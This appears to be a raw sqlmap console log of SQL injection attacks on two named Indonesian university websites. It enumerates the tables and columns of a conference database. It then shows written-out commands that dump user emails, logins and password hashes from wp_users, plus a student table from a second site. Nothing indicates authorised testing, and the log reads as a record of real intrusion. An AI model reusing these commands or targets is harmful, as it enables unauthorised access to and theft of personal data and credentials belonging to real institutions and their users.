[09:44:07] [INFO] fetching columns for table 'wp_comments' in database 'elite'
[09:44:07] [INFO] the SQL query used returns 15 entries
[09:44:08] [INFO] retrieved: "comment_ID","bigint(20) unsigned"
[09:44:08] [INFO] retrieved: "comment_post_ID","bigint(20) unsigned"
[09:44:09] [INFO] retrieved: "comment_author","tinytext"
[09:44:09] [INFO] retrieved: "comment_author_email","varchar(100)"
[09:44:10] [INFO] retrieved: "comment_author_url","varchar(200)"
[09:44:10] [INFO] retrieved: "comment_author_IP","varchar(100)"
[09:44:11] [INFO] retrieved: "comment_date","datetime"
[09:44:11] [INFO] retrieved: "comment_date_gmt","datetime"
[09:44:12] [INFO] retrieved: "comment_content","text"
[09:44:12] [INFO] retrieved: "comment_karma","int(11)"
[09:44:13] [INFO] retrieved: "comment_approved","varchar(20)"
[09:44:13] [INFO] retrieved: "comment_agent","varchar(255)"
[09:44:14] [INFO] retrieved: "comment_type","varchar(20)"
[09:44:14] [INFO] retrieved: "comment_parent","bigint(20) unsigned"
[09:44:14] [INFO] retrieved: "user_id","bigint(20) unsigned"
[09:44:15] [INFO] fetching columns for table 'tbl_reviewer' in database 'elite'
[09:44:15] [INFO] the SQL query used returns 5 entries
[09:44:15] [INFO] retrieved: "id","int(255)"
[09:44:15] [INFO] retrieved: "uid","varchar(255)"
[09:44:16] [INFO] retrieved: "name1","varchar(255)"
[09:44:16] [INFO] retrieved: "email1","varchar(255)"
[09:44:17] [INFO] retrieved: "invited","int(255)"
[09:44:17] [INFO] fetching columns for table 'tbl_visitors' in database 'elite'
[09:44:17] [INFO] the SQL query used returns 6 entries
[09:44:17] [INFO] retrieved: "id","int(13)"
[09:44:18] [INFO] retrieved: "date","varchar(255)"
[09:44:18] [INFO] retrieved: "time","varchar(255)"
[09:44:18] [INFO] retrieved: "ip","varchar(255)"
[09:44:18] [INFO] retrieved: "new_ip","varchar(255)"
[09:44:18] [INFO] retrieved: "hostname","varchar(255)"
[09:44:19] [INFO] fetching columns for table 'tbl_files' in database 'elite'
[09:44:19] [INFO] the SQL query used returns 25 entries
[09:44:19] [INFO] retrieved: "id","int(255)"
[09:44:19] [INFO] retrieved: "uid","varchar(255)"
[09:44:20] [INFO] retrieved: "date","varchar(255)"
[09:44:20] [INFO] retrieved: "time","varchar(255)"
[09:44:20] [INFO] retrieved: "ip","varchar(255)"
[09:44:20] [INFO] retrieved: "hostname","varchar(255)"
[09:44:21] [INFO] retrieved: "showname","text"
[09:44:21] [INFO] retrieved: "filename","text"
[09:44:22] [INFO] retrieved: "filesize","varchar(255)"
[09:44:22] [INFO] retrieved: "filetype","varchar(255)"
[09:44:23] [INFO] retrieved: "tipe","varchar(255)"
[09:44:23] [INFO] retrieved: "owner","varchar(255)"
[09:44:24] [INFO] retrieved: "regcode","varchar(255)"
[09:44:24] [INFO] retrieved: "count","int(255)"
[09:44:24] [INFO] retrieved: "info","text"
[09:44:25] [INFO] retrieved: "filetitle","text"
[09:44:25] [INFO] retrieved: "fileabstract","text"
[09:44:26] [INFO] retrieved: "filekeyword","text"
[09:44:26] [INFO] retrieved: "group","varchar(255)"
[09:44:27] [INFO] retrieved: "grup","varchar(255)"
[09:44:27] [INFO] retrieved: "allauthors","text"
[09:44:27] [INFO] retrieved: "topic","varchar(255)"
[09:44:28] [INFO] retrieved: "abstract_uid","varchar(255)"
[09:44:28] [INFO] retrieved: "reviewed","varchar(1)"
[09:44:29] [INFO] retrieved: "assigned","varchar(255)"
[09:44:29] [INFO] fetching columns for table 'tbl_topic' in database 'elite'
[09:44:30] [INFO] the SQL query used returns 3 entries
[09:44:30] [INFO] retrieved: "id","int(10)"
[09:44:30] [INFO] retrieved: "uid","varchar(255)"
[09:44:30] [INFO] retrieved: "topic","varchar(255)"
[09:44:30] [INFO] fetching columns for table 'wp_commentmeta' in database 'elite
'
[09:44:30] [INFO] the SQL query used returns 4 entries
[09:44:30] [INFO] retrieved: "meta_id","bigint(20) unsigned"
[09:44:31] [INFO] retrieved: "comment_id","bigint(20) unsigned"
[09:44:31] [INFO] retrieved: "meta_key","varchar(255)"
[09:44:31] [INFO] retrieved: "meta_value","longtext"
[09:44:31] [INFO] fetching columns for table 'tbl_system' in database 'elite'
[09:44:32] [INFO] the SQL query used returns 25 entries
[09:44:32] [INFO] retrieved: "id","int(255)"
[09:44:32] [INFO] retrieved: "mainpage","text"
[09:44:33] [INFO] retrieved: "password_admin","varchar(255)"
[09:44:33] [INFO] retrieved: "bigtitle","varchar(255)"
[09:44:34] [INFO] retrieved: "smalltitle","varchar(255)"
[09:44:34] [INFO] retrieved: "committee_email","varchar(255)"
[09:44:35] [INFO] retrieved: "webmaster_email","varchar(255)"
[09:44:35] [INFO] retrieved: "system_email","varchar(255)"
[09:44:36] [INFO] retrieved: "headerpic","varchar(255)"
[09:44:36] [INFO] retrieved: "finance","text"
[09:44:37] [INFO] retrieved: "var1","varchar(255)"
[09:44:37] [INFO] retrieved: "var2","varchar(255)"
[09:44:38] [INFO] retrieved: "var3","varchar(255)"
[09:44:38] [INFO] retrieved: "var4","varchar(255)"
[09:44:39] [INFO] retrieved: "var5","varchar(255)"
[09:44:39] [INFO] retrieved: "var5b","varchar(255)"
[09:44:40] [INFO] retrieved: "var6","varchar(255)"
[09:44:40] [INFO] retrieved: "var7","varchar(255)"
[09:44:41] [INFO] retrieved: "var8","varchar(255)"
[09:44:41] [INFO] retrieved: "var9","varchar(255)"
[09:44:42] [INFO] retrieved: "var10","varchar(255)"
[09:44:42] [INFO] retrieved: "var11","varchar(255)"
[09:44:43] [INFO] retrieved: "var12","varchar(255)"
[09:44:43] [INFO] retrieved: "var13","varchar(10)"
[09:44:44] [INFO] retrieved: "var14","varchar(10)"
[09:44:44] [INFO] fetching columns for table 'wp_posts' in database 'elite'
[09:44:45] [INFO] the SQL query used returns 23 entries
[09:44:45] [INFO] retrieved: "ID","bigint(20) unsigned"
[09:44:45] [INFO] retrieved: "post_author","bigint(20) unsigned"
[09:44:46] [INFO] retrieved: "post_date","datetime"
[09:44:46] [INFO] retrieved: "post_date_gmt","datetime"
[09:44:47] [INFO] retrieved: "post_content","longtext"
[09:44:47] [INFO] retrieved: "post_title","text"
[09:44:48] [INFO] retrieved: "post_excerpt","text"
[09:44:48] [INFO] retrieved: "post_status","varchar(20)"
[09:44:49] [INFO] retrieved: "comment_status","varchar(20)"
[09:44:49] [INFO] retrieved: "ping_status","varchar(20)"
[09:44:49] [INFO] retrieved: "post_password","varchar(20)"
[09:44:50] [INFO] retrieved: "post_name","varchar(200)"
[09:44:50] [INFO] retrieved: "to_ping","text"
[09:44:51] [INFO] retrieved: "pinged","text"
[09:44:51] [INFO] retrieved: "post_modified","datetime"
[09:44:52] [INFO] retrieved: "post_modified_gmt","datetime"
[09:44:52] [INFO] retrieved: "post_content_filtered","longtext"
[09:44:53] [INFO] retrieved: "post_parent","bigint(20) unsigned"
[09:44:53] [INFO] retrieved: "guid","varchar(255)"
[09:44:54] [INFO] retrieved: "menu_order","int(11)"
[09:44:54] [INFO] retrieved: "post_type","varchar(20)"
[09:44:55] [INFO] retrieved: "post_mime_type","varchar(100)"
[09:44:55] [INFO] retrieved: "comment_count","bigint(20)"
[09:44:55] [INFO] fetching columns for table 'wp_term_relationships' in database
'elite'
[09:44:55] [INFO] the SQL query used returns 3 entries
[09:44:56] [INFO] retrieved: "object_id","bigint(20) unsigned"
[09:44:56] [INFO] retrieved: "term_taxonomy_id","bigint(20) unsigned"
[09:44:56] [INFO] retrieved: "term_order","int(11)"
[09:44:56] [INFO] fetching columns for table 'wp_termmeta' in database 'elite'
[09:44:57] [INFO] the SQL query used returns 4 entries
[09:44:57] [INFO] retrieved: "meta_id","bigint(20) unsigned"
[09:44:57] [INFO] retrieved: "term_id","bigint(20) unsigned"
[09:44:57] [INFO] retrieved: "meta_key","varchar(255)"
[09:44:57] [INFO] retrieved: "meta_value","longtext"
Database: elite
Table: tbl_reviewer
[5 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| email1 | varchar(255) |
| id | int(255) |
| invited | int(255) |
| name1 | varchar(255) |
| uid | varchar(255) |
+---------+--------------+
Database: elite
Table: tbl_participants
[26 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| date | varchar(255) |
| time | varchar(255) |
| city | varchar(255) |
| country | varchar(255) |
| email | varchar(255) |
| fax | varchar(255) |
| fee | varchar(255) |
| from_internal | varchar(255) |
| hostname | varchar(255) |
| id | int(255) |
| info | text |
| institution | text |
| ip | varchar(255) |
| is_presenter | varchar(255) |
| name1 | varchar(255) |
| name2 | varchar(255) |
| name3 | varchar(255) |
| password2 | varchar(255) |
| phone | varchar(255) |
| procbook | varchar(255) |
| registered | varchar(255) |
| street | varchar(255) |
| title | varchar(255) |
| uid | varchar(255) |
| userid | varchar(255) |
| zipcode | varchar(255) |
+---------------+--------------+
Database: elite
Table: wp_term_taxonomy
[6 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| count | bigint(20) |
| description | longtext |
| parent | bigint(20) unsigned |
| taxonomy | varchar(32) |
| term_id | bigint(20) unsigned |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+
Database: elite
Table: wp_commentmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| comment_id | bigint(20) unsigned |
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
+------------+---------------------+
Database: elite
Table: tbl_system
[25 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| bigtitle | varchar(255) |
| committee_email | varchar(255) |
| finance | text |
| headerpic | varchar(255) |
| id | int(255) |
| mainpage | text |
| password_admin | varchar(255) |
| smalltitle | varchar(255) |
| system_email | varchar(255) |
| var1 | varchar(255) |
| var10 | varchar(255) |
| var11 | varchar(255) |
| var12 | varchar(255) |
| var13 | varchar(10) |
| var14 | varchar(10) |
| var2 | varchar(255) |
| var3 | varchar(255) |
| var4 | varchar(255) |
| var5 | varchar(255) |
| var5b | varchar(255) |
| var6 | varchar(255) |
| var7 | varchar(255) |
| var8 | varchar(255) |
| var9 | varchar(255) |
| webmaster_email | varchar(255) |
+-----------------+--------------+
Database: elite
Table: tbl_paper_reviewer
[6 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| id | int(255) |
| paper_uid | varchar(255) |
| review | text |
| reviewer_name | varchar(255) |
| reviewer_uid | varchar(255) |
| uid | varchar(255) |
+---------------+--------------+
Database: elite
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr
act.php?id=78 -D elite -T wp_users -C user_email,user_login,user_pass, --dump
Database: elite
Table: wp_terms
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| name | varchar(200) |
| slug | varchar(200) |
| term_group | bigint(10) |
| term_id | bigint(20) unsigned |
+------------+---------------------+
Database: elite
Table: wp_links
[13 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| link_description | varchar(255) |
| link_id | bigint(20) unsigned |
| link_image | varchar(255) |
| link_name | varchar(255) |
| link_notes | mediumtext |
| link_owner | bigint(20) unsigned |
| link_rating | int(11) |
| link_rel | varchar(255) |
| link_rss | varchar(255) |
| link_target | varchar(25) |
| link_updated | datetime |
| link_url | varchar(255) |
| link_visible | varchar(20) |
+------------------+---------------------+
Database: elite
Table: wp_comments
[15 columns]
+----------------------+---------------------+
| Column | Type |
+----------------------+---------------------+
| comment_agent | varchar(255) |
| comment_approved | varchar(20) |
| comment_author | tinytext |
| comment_author_email | varchar(100) |
| comment_author_IP | varchar(100) |
| comment_author_url | varchar(200) |
| comment_content | text |
| comment_date | datetime |
| comment_date_gmt | datetime |
| comment_ID | bigint(20) unsigned |
| comment_karma | int(11) |
| comment_parent | bigint(20) unsigned |
| comment_post_ID | bigint(20) unsigned |
| comment_type | varchar(20) |
| user_id | bigint(20) unsigned |
+----------------------+---------------------+
Database: elite
Table: wp_options
[4 columns]
+--------------+---------------------+
| Column | Type |
+--------------+---------------------+
| autoload | varchar(20) |
| option_id | bigint(20) unsigned |
| option_name | varchar(191) |
| option_value | longtext |
+--------------+---------------------+
Database: elite
Table: wp_usermeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_key | varchar(255) |
| meta_value | longtext |
| umeta_id | bigint(20) unsigned |
| user_id | bigint(20) unsigned |
+------------+---------------------+
Database: elite
Table: tbl_files
[25 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| count | int(255) |
| date | varchar(255) |
| group | varchar(255) |
| time | varchar(255) |
| abstract_uid | varchar(255) |
| allauthors | text |
| assigned | varchar(255) |
| fileabstract | text |
| filekeyword | text |
| filename | text |
| filesize | varchar(255) |
| filetitle | text |
| filetype | varchar(255) |
| grup | varchar(255) |
| hostname | varchar(255) |
| id | int(255) |
| info | text |
| ip | varchar(255) |
| owner | varchar(255) |
| regcode | varchar(255) |
| reviewed | varchar(1) |
| showname | text |
| tipe | varchar(255) |
| topic | varchar(255) |
| uid | varchar(255) |
+--------------+--------------+
Database: elite
Table: tbl_abstract
[18 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| date | varchar(255) |
| time | varchar(255) |
| accepted | varchar(1) |
| authors | text |
| code1 | varchar(255) |
| content | text |
| hostname | varchar(255) |
| id | int(10) |
| institutions | text |
| ip | varchar(255) |
| keywords | varchar(255) |
| last_update | varchar(255) |
| payment | varchar(255) |
| presenter | varchar(255) |
| title | text |
| topic | varchar(255) |
| uid | varchar(255) |
| uid_owner | varchar(255) |
+--------------+--------------+
Database: elite
Table: tbl_topic
[3 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| id | int(10) |
| topic | varchar(255) |
| uid | varchar(255) |
+--------+--------------+
Database: elite
Table: wp_postmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
| post_id | bigint(20) unsigned |
+------------+---------------------+
Database: elite
Table: tbl_visitors
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| date | varchar(255) |
| time | varchar(255) |
| hostname | varchar(255) |
| id | int(13) |
| ip | varchar(255) |
| new_ip | varchar(255) |
+----------+--------------+
Database: elite
Table: wp_posts
[23 columns]
+-----------------------+---------------------+
| Column | Type |
+-----------------------+---------------------+
| comment_count | bigint(20) |
| comment_status | varchar(20) |
| guid | varchar(255) |
| ID | bigint(20) unsigned |
| menu_order | int(11) |
| ping_status | varchar(20) |
| pinged | text |
| post_author | bigint(20) unsigned |
| post_content | longtext |
| post_content_filtered | longtext |
| post_date | datetime |
| post_date_gmt | datetime |
| post_excerpt | text |
| post_mime_type | varchar(100) |
| post_modified | datetime |
| post_modified_gmt | datetime |
| post_name | varchar(200) |
| post_parent | bigint(20) unsigned |
| post_password | varchar(20) |
| post_status | varchar(20) |
| post_title | text |
| post_type | varchar(20) |
| to_ping | text |
+-----------------------+---------------------+
Database: elite
Table: wp_term_relationships
[3 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| object_id | bigint(20) unsigned |
| term_order | int(11) |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+
Database: elite
Table: wp_termmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
| term_id | bigint(20) unsigned |
+------------+---------------------+
[09:44:57] [INFO] fetched data logged to text files under 'C:\Users\SRS\.sqlmap\
output\elite.event.uinjkt.ac.id'
[*] shutting down at 09:44:57

C:\>Python27\sqlmap\sqlmap.py -u http://akademik.fh.unsoed.ac.id/lowongan.php?id
=110 -D c1akademikfh -T mahasiswa -C --dump